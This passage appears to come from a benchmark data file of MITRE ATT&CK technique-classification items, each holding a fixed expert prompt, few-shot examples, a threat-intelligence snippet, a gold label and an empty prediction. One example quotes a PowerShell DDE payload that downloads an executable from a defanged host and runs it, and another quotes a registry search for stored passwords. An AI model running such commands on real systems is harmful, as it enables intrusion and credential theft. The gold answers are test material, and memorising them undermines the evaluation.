MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In this case, we can see the binary installation path and local reconnaissance to determine which flavor of Linux the malware is running. This is followed by a number of Linux shell command style commands related to the malware establishing persistence\n\t - T1082: System Information Discovery\n- Text: can be used to display ARP configuration information on the host.\n\t - T1016: System Network Configuration Discovery\n- Text: POWRUNER may collect information about the currently logged in user by running \"whoami\" on a victim.\n\t - T1033: System Owner/User Discovery\n", "input": "\nhas a tool that can obtain information about the local system.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AuTo Stealer can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: TrickBot can modify registry entries.\n\t - T1112: Modify Registry\n- Text: BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nhas used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The developer rewrote a large part of the code however the workflow is the same as previously and some features are copy/paste. The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011. The code is not exactly the same but the workflow and some constants are similar\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: It first grabs an encrypted blob stored away in a global variable and pulls out 381 bytes of this encrypted data: The standard win32 api CryptDecrypt uses rc4 to decrypt this blob into a hardcoded c2, url path, and url parameters listed below with a simple 140-bit key \u201c\\x8B\\xFF\\x55\\x8B\\xEC\\x83\\xEC\\x50\\xA1\\x84\\x18\\x03\\x68\\x33\\xC9\\x66\\xF7\\x45\\x10\\xE8\\x1F\\x89\\x45\\xFC\\x8B\\x45\\x14\\x56\u2033\n\t - T1573: Encrypted Channel\n- Text: Sliver can use mutual TLS and RSA cryptography to exchange a session key.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n", "input": "\nuses AES to encrypt C2 traffic.", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials.\n\t - T1056.002: Input Capture - GUI Input Capture\n- Text: LAPSUS$ has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval.\n\t - T1621: Multi-Factor Authentication Request Generation\n- Text: OSX/Shlayer can escalate privileges to root by asking the user for credentials.\n\t - T1548.004: Abuse Elevation Control Mechanism - Elevated Execution with Prompt\n", "input": "\nprompts the user for credentials.", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Recent samples, with the ability to discover wireless network settings and credentials will spawn an instance of netsh.exe after a brief sleeping period (after launch). The syntax utilized initially is\n\t - T1016: System Network Configuration Discovery\n- Text: UNC2452 has used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: has a tool that can enumerate current network connections.\n\t - T1049: System Network Connections Discovery\n", "input": "\nperforms local network configuration discovery using ipconfig.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Crutch is able to bypass some security layers by abusing legitimate infrastructure \u2013 here Dropbox \u2013 in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3] A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis The threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5] The group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China\n\t - T1102: Web Service\n- Text: Turla has frequently used compromised WordPress sites for C2 infrastructure.\n\t - T1584.006: Compromise Infrastructure - Web Services\n", "input": "\nis capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.", "gold": "- T1102: Web Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once it is encrypted using the XOR algorithm, the buffer is encoded with BASE64\n\t - T1027: Obfuscated Files or Information\n- Text: has packed malware payloads before delivery to victims.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n", "input": "\nThe code is obfuscated in order to hide any malicious activity on the remote server", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After unpacking the module, it is packed with an additional inner packer Pe123\\RPolyCryptor\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Chinoxy has encrypted its configuration file.\n\t - T1027: Obfuscated Files or Information\n- Text: Gamaredon Group has obfuscated .NET executables by inserting junk code.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", "input": "\nA version of uses the MPRESS packer.", "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.\n\t - T1105: Ingress Tool Transfer\n\t - T1569.002: System Services - Service Execution\n- Text: APT33 has used HTTP for command and control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: We have gathered three samples of the default loader associated with this group and extracted the following configurations: SHA256 of Sample Configuration 82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190 LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019] db453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019] 7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73 LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018139.59.46[.]154:3543\u2019, \u2018-t\u2019, \u2018obfs3\u2019] \u00a0 These configurations show that this group uses both fully-qualified domain names and IP addresses to host their Pupy C2 servers\n\t - T1016: System Network Configuration Discovery\n\t - T1102: Web Service\n\t - T1008: Fallback Channels\n", "input": "\ncontains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole can enumerate Registry values, keys, and data.\n\t - T1012: Query Registry\n- Text: reg query HKCU /f password /t REG_SZ /s\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n- Text: gsecdump can dump Windows password hashes from the SAM.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n", "input": "\nqueried the Registry to identify victim information.", "gold": "- T1012: Query Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes\n\t - T1105: Ingress Tool Transfer\n- Text: REvil can launch an instance of itself with administrative rights using runas.\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware\u2019s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\n/user : Executes downloaded file with parameters specified using CreateProcessAsUser cmd /c : Executes command on infected endpoint\u00a0 Conclusion\u00a0 The actor behind Honeybee has been operating with new implants since at least November 2017 with the first known version of NTWDBLIB installer", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n", "input": "\nDHS and FBI are distributing these IP addresses to enable network defense activities and reduce exposure to the DDoS command-and-control network", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has run a plug-in on a victim to spread through the local network by using and accessing admin shares.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Okrum's loader can create a new service named NtmsSvc to execute the payload.\n\t - T1569.002: System Services - Service Execution\n- Text: Operation Wocao has used SMB to copy files to and from target systems.\n\t - T1570: Lateral Tool Transfer\n", "input": "\nAdditionally, some of this early activity shares a similarity with current FIN7 operations \u2013 the use of Power Admin PAExec for lateral movement", "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The key differences in this variant: Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file There is one CAB file for an x86 system and another for an x64 system This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass exe is the program vulnerable to the UAC bypass attack dll runs install.bat to set up the service (same as NTWDBLIB.dll) exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: The first way in which the malware can be launched is by hijacking a DLL. Being placed in the same folder as explorer.exe, the wrapper DLL is loaded during the Windows startup into the Windows Explorer process instead of the legitimate library located in the %windir%\\system32 folder\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: Archive files that contain a legitimate executable and a malicious DLL, to be used in a DLL hijacking technique, taking advantage of legitimate executables such as Outlook and Avast proxy, to load a malicious DLL\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", "input": "\nUAC bypass via DLL hijacking requires: A Windows executable with the auto-elevate property in its manifest A Windows executable in a secure directory (%systemroot%\\system32) The malicious NTWDBLIB DLL performs the simple task of setting up the malicious ipnet.dll as a service by running one of the two batch files contained in the CAB file (which is also dropped to %systemroot%\\system32): NTWDBLIB executing the installer batch files under the context of cliconfg.exe.\u00a0 The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll", "gold": "- T1055: Process Injection\n- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by as a name for malware.\n\t - T1036: Masquerading\n- Text: APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.\n\t - T1036.003: Masquerading - Rename System Utilities\n- Text: ShimRatReporter spoofed itself as \"AlphaZawgyl_font.exe\", a specialized Unicode font.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", "input": "\nThere was a slight deviation in the November grouping, where the three samples we collected still used the Joohn author name for the last modified field but reverted to a default USER/user author name for the creator field", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Elise injects DLL files into iexplore.exe.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: The Netsh commands for Windows Firewall provide a command-line alternative to the capabilities of the Windows Firewall Control Panel utility. By using the Netsh firewall commands, you can configure and view Windows Firewall exceptions and configuration settings\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: Figure 1 Article referenced by decoy document in attack against British government agency \u00a0 The attached document leverages a DDE exploit to ultimately execute the following code:c:\\\\windows\\\\system32\\\\cmd.exe \"/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://881.000webhostapp[.]com/0_31.doc', '%TEMP%\\\\AAA.exe');Start-Process('%TEMP%\\\\AAA.exe')Palo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers continue to leverage it\n\t - T1055.012: Process Injection - Process Hollowing\n", "input": "\nThis version\u00a0injects a malicious module into one of\u00a0Avast's processes, whereas early versions of the campaign detected Avast and quit", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Conficker terminates various services related to system security and Windows.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.\n\t - T1489: Service Stop\n- Text: HARDRAIN opens the Windows Firewall to modify incoming connections.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n", "input": "\nterminates antimalware processes.", "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Droppers used by use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 \u2013 0xAF to obfuscate payloads.\n\t - T1027: Obfuscated Files or Information\n- Text: TrailBlazer has used random identifier strings to obscure its C2 operations and result codes.\n\t - T1001.001: Data Obfuscation - Junk Data\n- Text: Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", "input": "\nuses basic obfuscation in the form of spaghetti code.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 1) Creating malicious Word documents by injecting a remote template URL 2) Hosting a C2 server to gather credentials entered into authentication dialog boxes displayed when attempting to obtain the remote template\n\t - T1221: Template Injection\n- Text: Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. Targeting the defense industry and specifically Lockheed Martin is a known target for this actor\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: This is an application document that has been used to provide a decoy to the Bisonal malware. This conference has some high-ranking government and business attendees. In 2019, a Russian RTF document \u2014 \u0441\u0443\u0434\u0430\u043b\u0433\u0430\u0430.doc (research.doc) \u2014 was used with an exploit to drop the winhelp.wll file, which contains Bisonal. Based on our research and the released paper mentioned above, the Bisonal malware is part of the Tonto Team arsenal. Tonto Team was mentioned in the media in 2017 as one of the actors who targeted South Korea, when the country announced it would deploy a Terminal High-Altitude Air Defense (THAAD) in response to North Korean missile tests. At this time, researchers connected the Tonto Team to China\n\t - T1203: Exploitation for Client Execution\n", "input": "\nExploit Analysis Despite being an older vulnerability, many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word", "gold": "- T1068: Exploitation for Privilege Escalation\n- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SILENTTRINITY can determine if an anti-virus product is installed through the resolution of the service's virtual SID.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Diavol can attempt to stop security software.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: Notably, one of the tools used in the attack exploited the CVE 2021 21551 vulnerability in a Dell driver in what was the first recorded abuse of this security flaw.\n\t - T1211: Exploitation for Defense Evasion\n\t - T1190: Exploit Public-Facing Application\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n", "input": "\nKeep security software up-to-date with the latest definitions Protection Norton Security, Symantec Endpoint Protection, and other Symantec security products protect users against these threats through the following detections: AV Backdoor.Cadelspy Backdoor.Remexi Backdoor.Remexi.B IPS System Infected: Backdoor.Cadelspy Activity 2 System Infected: Backdoor.Remexi Activity Indicators of compromise We have also compiled an indicators-of-compromise document containing further details which can be used to help identify the threats if they are present in your environment", "gold": "- T1518.001: Software Discovery - Security Software Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to obtain information about services: \"net start >> %temp%\\download\"\n\t - T1007: System Service Discovery\n- Text: Hydraq creates a backdoor through which remote attackers can monitor processes.\n\t - T1057: Process Discovery\n- Text: Flame identifies security software such as antivirus through the Security module.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", "input": "\nuses tasklist /svc to display running tasks.", "gold": "- T1007: System Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Since September of 2018, Redaman banking malware has been distributed through malspam. These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document. In September 2018, the attachments were zip archives. In October 2018, the attachments were zip archives, 7-zip archives, and rar archives. In November 2018, the attachments were rar archives. And in December 2018, the attachments changed to gzip archives with file names ending in .gz\n\t - T1027: Obfuscated Files or Information\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1036: Masquerading\n- Text: Spark has been packed with Enigma Protector to obfuscate its contents.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", "input": "\nThe launcher module, obfuscated with the notorious Metasploit\u2019s shikata_ga_nai encoder, is the same for all the droppers", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hildegard has packed ELF files into other binaries.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities\n\t - T1049: System Network Connections Discovery\n\t - T1518: Software Discovery\n\t - T1027: Obfuscated Files or Information\n- Text: Invoke-PSImage can be used to embed payload data within a new image file.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n", "input": "\nuses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.", "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process\n\t - T1055: Process Injection\n\t - T1055.002: Process Injection - Portable Executable Injection\n- Text: ZxShell.dll is injected in a shared SVCHOST process. The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: WastedLocker's custom crypter, CryptOne, leveraged the VirtualAlloc() API function to help execute the payload.\n\t - T1106: Native API\n", "input": "\nleverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection.", "gold": "- T1106: Native API", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In November 2018, Cisco Talos published research on an attack campaign named DNSpionage. It involved attacks using malware to compromise individual endpoints, but most interestingly described an effort to specifically hijack DNS entries of government organizations to redirect visitors to likely malicious, adversary operated systems. Both FireEye and Crowdstrike followed up with their own assessments for the DNS hijacking efforts, and described operations extending back to January 2017. No attribution to any known adversary groups was provided, other than that the target radius was primarily in the Middle East and the adversary was also likely operating out of that region. \n\t - T1584.002: Compromise Infrastructure - DNS Server\n\t - T1583.002: Acquire Infrastructure - DNS Server\n\t - T1496: Resource Hijacking\n\t - T1189: Drive-by Compromise\n- Text: Our latest Transparent Tribe research confirms that 